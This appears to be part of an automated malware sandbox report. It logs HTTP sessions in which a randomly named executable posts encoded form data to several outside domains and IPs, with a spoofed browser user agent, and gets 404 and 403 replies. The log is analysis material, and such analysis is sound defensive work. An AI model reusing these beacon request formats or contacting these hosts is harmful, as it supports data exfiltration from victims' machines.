                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.549990199.192.21.169803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:35.888818979 CET1783OUTPOST /bowc/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.lonfor.website
                                                          Origin: http://www.lonfor.website
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.lonfor.website/bowc/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 35 54 47 79 50 6c 56 43 39 59 31 51 31 41 5a 2b 59 31 2f 4a 57 69 49 31 73 42 43 4d 74 53 36 37 32 59 33 43 67 47 6c 71 2f 6c 6b 73 56 79 52 38 58 46 5a 4e 4d 78 77 2b 73 4c 4d 4e 6e 35 42 66 34 61 74 38 51 75 4e 6a 59 4a 76 73 49 6e 69 4c 41 62 48 31 4d 55 68 73 76 43 49 6b 74 77 4b 59 31 59 2f 48 51 4f 35 71 65 61 54 78 77 6b 36 55 6e 77 42 69 6c 61 41 4b 58 38 58 42 33 39 49 30 39 78 62 76 54 77 78 6a 66 30 6d 4b 33 77 72 6d 52 34 61 6d 61 4a 4c 56 56 57 47 4d 6b 33 79 46 33 73 41 4a 6f 64 62 64 69 69 49 45 55 76 53 2f 77 77 31 61 38 68 4b 4c 71 75 62 50 63 6c 4d 53 4e 6e 6c 63 34 56 41 53 6d 69 50 31 31 55 79 6d 57 54 35 33 69 66 6e 6d 61 6b 44 4c 48 44 49 41 4f 46 46 72 46 6e 67 56 6f 37 57 32 79 58 34 62 47 56 38 4a 66 70 34 4e 58 74 51 42 59 36 76 31 75 39 36 64 66 49 74 6d 6d 53 76 35 65 6e 70 79 70 71 70 76 46 62 5a 67 7a 66 67 31 77 56 47 71 [TRUNCATED]
                                                          Data Ascii: R4Stj2k=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10pp5TGyPlVC9Y1Q1AZ+Y1/JWiI1sBCMtS672Y3CgGlq/lksVyR8XFZNMxw+sLMNn5Bf4at8QuNjYJvsIniLAbH1MUhsvCIktwKY1Y/HQO5qeaTxwk6UnwBilaAKX8XB39I09xbvTwxjf0mK3wrmR4amaJLVVWGMk3yF3sAJodbdiiIEUvS/ww1a8hKLqubPclMSNnlc4VASmiP11UymWT53ifnmakDLHDIAOFFrFngVo7W2yX4bGV8Jfp4NXtQBY6v1u96dfItmmSv5enpypqpvFbZgzfg1wVGqKb6Sra2m+ZN32gee3+Y2TppFTzVlzAr+8NnWAqSvbP8fknesUU06wp2SuKmGg4LcoTgmTbFjEHM8OQC3mdKE9gFtzbVAYOmJyQtVG9pSTakK5/q18X6pPJHZqzV4NiQEmY1uGIZ10P+cQdTIgpw2IlcSu7sBz1bf6ODOiS6lN+vZVfGDDvR55cpR1fxXduUtXuylderv5EYJzFv/yjmdPeIwoJ5/7YAi6BFC4L0ifU5bqOQsa8WYAM74vQHTwjDDOZ+rqWNLqjmZody0kaZuHBquGw8aMqymf4/6Dtw7qIM82FWQ8fCe/bjD9r2gJdDcBUCa61Ojlw++EpycrcLrYezLBKf8FlzypoYEn/jMsLYHA/9xV18nIeqdKkGgUkZ0xoGD0GPxNh+Oj6sjc7fyCpl92cghWUgxwkHxm+FK2hO2VqF2z5/TaHt1KmP5DTiy5B6aJMs47ms5oOB0tx6C7avOVY3ZI0bPww3gPqzqbsOBM4hDCbMyQWB8+J2PnOdrX5FU7DWU5JQQJjORMgKhVTeHBlTDHazgpNcI9A1ArOoB1ao1qdHQZFAeU0dAfmzr26Ou9Ob/4terDBVUgJi8hch+VfgClW1t8ikjtExAJKdV34s3LdCdR7h+wOVxwprbbgsz6a8DxtA0EgREcaU1PIkRydgYMsVGKj [TRUNCATED]
                                                          Jan 16, 2025 09:25:36.462815046 CET918INHTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:36 GMT
                                                          Server: Apache
                                                          Content-Length: 774
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.549991199.192.21.169803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:38.429352045 CET486OUTGET /bowc/?R4Stj2k=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO84RxecymeNEzyLIaWcKrL+RZ5eMRfwg+qeUwmqwyFGBk9g==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.lonfor.website
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:25:39.016755104 CET933INHTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:38 GMT
                                                          Server: Apache
                                                          Content-Length: 774
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.549992154.197.162.239803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:44.545206070 CET752OUTPOST /cf9p/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.investshares.net
                                                          Origin: http://www.investshares.net
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.investshares.net/cf9p/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6c 48 6e 6c 4e 62 61 71 65 77 6a 78 50 63 30 4f 79 57 33 70 43 6f 68 32 4e 59 6a 70 61 65 4f 69 38 61 79 55 6f 4e 36 69 43 71 32 7a 75 6e 70 76 74 38 4c 41 44 65 74 74 48 37 73 77 65 62 78 51 62 75 55 59 46 65 2f 62 42 4a 2f 58 67 4d 44 66 64 4c 73 67 42 66 4c 32 39 43 52 30 30 77 78 79 41 39 42 7a 43 4f 42 67 57 52 71 70 54 7a 65 48 75 68 31 51 38 39 72 6b 65 59 7a 45 4a 4c 43 6c 65 42 71 69 35 38 36 68 35 6f 34 75 47 37 31 4c 52 61 4b 49 49 77 70 79 5a 56 59 2b 67 63 78 45 77 78 53 78 59 33 51 61 52 72 47 70 71 64 61 79 48 2b 62 65 4b 5a 43 35 42 38 45 3d
                                                          Data Ascii: R4Stj2k=gmPPOGT6pgqjlHnlNbaqewjxPc0OyW3pCoh2NYjpaeOi8ayUoN6iCq2zunpvt8LADettH7swebxQbuUYFe/bBJ/XgMDfdLsgBfL29CR00wxyA9BzCOBgWRqpTzeHuh1Q89rkeYzEJLCleBqi586h5o4uG71LRaKIIwpyZVY+gcxEwxSxY3QaRrGpqdayH+beKZC5B8E=
                                                          Jan 16, 2025 09:25:45.120225906 CET309INHTTP/1.1 403 Forbidden
                                                          Server: nginx
                                                          Date: Wed, 15 Jan 2025 16:25:09 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.549993154.197.162.239803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:47.103009939 CET772OUTPOST /cf9p/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.investshares.net
                                                          Origin: http://www.investshares.net
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.investshares.net/cf9p/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 71 69 2f 2f 65 55 70 50 65 69 42 71 32 7a 6d 48 70 71 67 63 4c 62 44 65 67 4f 48 2b 55 77 65 62 6c 51 62 76 45 59 5a 39 58 61 48 5a 2f 56 6d 4d 44 64 58 72 73 67 42 66 4c 32 39 43 55 38 30 77 35 79 41 4a 46 7a 45 71 56 6a 51 68 71 71 43 7a 65 48 6a 42 30 34 38 39 72 47 65 61 47 72 4a 49 36 6c 65 41 61 69 35 4a 4f 67 75 34 34 73 5a 72 30 6d 43 5a 72 45 4f 67 31 53 52 47 41 38 67 2f 49 2b 38 6e 6a 62 43 56 59 79 43 4c 71 52 36 4f 53 46 57 4f 36 33 51 36 53 4a 66 72 51 76 4c 7a 31 6c 37 4c 59 33 2f 77 49 41 30 41 48 7a 44 64 39 31
                                                          Data Ascii: R4Stj2k=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMqi//eUpPeiBq2zmHpqgcLbDegOH+UweblQbvEYZ9XaHZ/VmMDdXrsgBfL29CU80w5yAJFzEqVjQhqqCzeHjB0489rGeaGrJI6leAai5JOgu44sZr0mCZrEOg1SRGA8g/I+8njbCVYyCLqR6OSFWO63Q6SJfrQvLz1l7LY3/wIA0AHzDd91
                                                          Jan 16, 2025 09:25:47.652390003 CET309INHTTP/1.1 403 Forbidden
                                                          Server: nginx
                                                          Date: Wed, 15 Jan 2025 16:25:12 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.549994154.197.162.239803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:49.660794973 CET1789OUTPOST /cf9p/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.investshares.net
                                                          Origin: http://www.investshares.net
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.investshares.net/cf9p/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 69 69 2f 4a 4b 55 6f 75 65 69 41 71 32 7a 6c 48 70 72 67 63 4b 44 44 65 70 48 48 2b 52 4e 65 64 70 51 55 76 59 59 4a 4d 58 61 4f 5a 2f 56 6b 4d 44 59 64 4c 73 70 42 66 62 36 39 43 6b 38 30 77 35 79 41 50 70 7a 45 2b 42 6a 4c 68 71 70 54 7a 65 62 75 68 31 56 38 39 79 35 65 61 54 55 49 34 61 6c 65 67 4b 69 37 66 69 67 74 59 34 71 59 72 30 2b 43 5a 6d 47 4f 67 70 34 52 46 64 5a 67 2f 77 2b 2b 42 2b 6c 52 68 55 31 42 4b 2b 79 78 38 61 45 55 4a 4f 4a 52 4b 57 44 44 73 78 4f 4b 69 41 4d 39 50 38 53 78 6a 70 33 6a 32 72 42 55 74 4d 70 55 68 61 74 6e 2b 31 63 51 59 70 62 32 6b 46 73 71 47 72 2b 59 2f 30 38 6f 79 45 2f 4f 41 54 43 64 47 6c 73 50 58 44 38 55 45 2f 45 76 78 2f 62 44 59 53 66 2b 35 47 56 71 44 4a 6d 74 75 2f 4b 75 50 71 79 74 59 49 61 56 51 39 70 70 63 37 32 61 62 37 54 76 45 45 37 74 6b 6a 6e 7a 45 4c 68 53 31 6c 30 72 71 48 57 45 70 37 4d 6e 4d [TRUNCATED]
                                                          Data Ascii: R4Stj2k=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMii/JKUoueiAq2zlHprgcKDDepHH+RNedpQUvYYJMXaOZ/VkMDYdLspBfb69Ck80w5yAPpzE+BjLhqpTzebuh1V89y5eaTUI4alegKi7figtY4qYr0+CZmGOgp4RFdZg/w++B+lRhU1BK+yx8aEUJOJRKWDDsxOKiAM9P8Sxjp3j2rBUtMpUhatn+1cQYpb2kFsqGr+Y/08oyE/OATCdGlsPXD8UE/Evx/bDYSf+5GVqDJmtu/KuPqytYIaVQ9ppc72ab7TvEE7tkjnzELhS1l0rqHWEp7MnMtx8Mg5QPBK7ixmCAtfOv2xYhzTx5hg6UtL1vgMBCQtt+YR7B60otxNOL6Wpz2n+/Gp8iz/l1dBcfBRPtsDdu/51prAkYyS4NvQwy+rAAJgvMhcSSCZUtcIV9Blkscmev0QBJWWEYmaG1Yxfg4Fr47cVNZUk8crSJ2YHP0Vs9S4eabzPr+32sa4X0nJPFOAmJobgVzhVu23OvSnWWA80zsQYTZW022w/xtYWRmYMuIVZR/oecH2fLHGC2t59dcqTOdIHd/qcKri4Sc0TG1aWTuPep8RmsC7GJL4FlT+PxBDG38+axWyVH9IK/jB9iiso0FvuEatOa3t3arHuSpYCnkHJDvZkfzFkCDWrTITE0+NvWFH42n7FVXSCQvMfarJsJv2dyRaj1qQRjIr3CcNOfFbNH5Ak98Qhbhu/q5EWVyOEyeafg5ciI8xe4wxrMN+PHsYhXWwKD4ZgAPox4tfNFe/OOBHUOtTlyeVKpC1fqhMz1j3FM8CLbocXMNaR4UcRHJF6svubnzNRlgJ3N1w1+7tMtCQ90g4oAt+juYXRm18gVL2Hh0fSFiwpMSIYQ7DiKrO6tC7WJJ8mxBc7jXZEJke0nq5VTJc0R8c3FwdSapqyhnFnAphy6x0VgyYvOsMzXepzerCffJAEumNTjEvnzaFuFIfdiorsyrG [TRUNCATED]
                                                          Jan 16, 2025 09:25:50.221178055 CET309INHTTP/1.1 403 Forbidden
                                                          Server: nginx
                                                          Date: Wed, 15 Jan 2025 16:25:14 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.549995154.197.162.239803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:52.210787058 CET488OUTGET /cf9p/?R4Stj2k=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFI57Xl4izZbo5Nf+t7hBu9DYDZsVVcrRpMjG9JV+RkwAygg==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.investshares.net
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:25:52.794837952 CET141INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 15 Jan 2025 16:25:17 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 0
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.549996134.122.133.80803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:26:06.792810917 CET764OUTPOST /jpjz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.jrcov55qgcxp5fwa.top
                                                          Origin: http://www.jrcov55qgcxp5fwa.top
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6e 69 76 66 44 2b 49 74 6b 2b 39 75 44 7a 34 77 6d 6e 6c 75 54 44 6b 32 33 57 6c 47 2f 7a 70 78 37 5a 72 6d 79 56 69 77 7a 55 4f 50 31 7a 31 51 4d 46 72 52 77 69 68 2f 6f 56 68 4b 4a 6f 65 57 78 4e 62 59 6a 34 58 64 66 53 57 67 4a 62 7a 58 59 6a 32 47 6a 70 32 71 69 54 75 64 6d 47 61 54 4e 66 57 52 39 67 61 65 4c 75 57 65 47 7a 64 72 43 5a 42 4a 4f 4e 62 6f 34 4c 41 6b 48 6d 58 50 6a 77 4c 4a 78 4c 53 64 48 35 36 31 76 71 5a 62 55 66 7a 64 74 43 42 6a 75 73 36 6a 37 61 4e 62 77 46 74 7a 4f 48 44 44 76 76 52 62 61 46 50 42 39 6e 48 44 59 70 66 68 71 55 63 3d
                                                          Data Ascii: R4Stj2k=Muqh5VPLPtCMnivfD+Itk+9uDz4wmnluTDk23WlG/zpx7ZrmyViwzUOP1z1QMFrRwih/oVhKJoeWxNbYj4XdfSWgJbzXYj2Gjp2qiTudmGaTNfWR9gaeLuWeGzdrCZBJONbo4LAkHmXPjwLJxLSdH561vqZbUfzdtCBjus6j7aNbwFtzOHDDvvRbaFPB9nHDYpfhqUc=
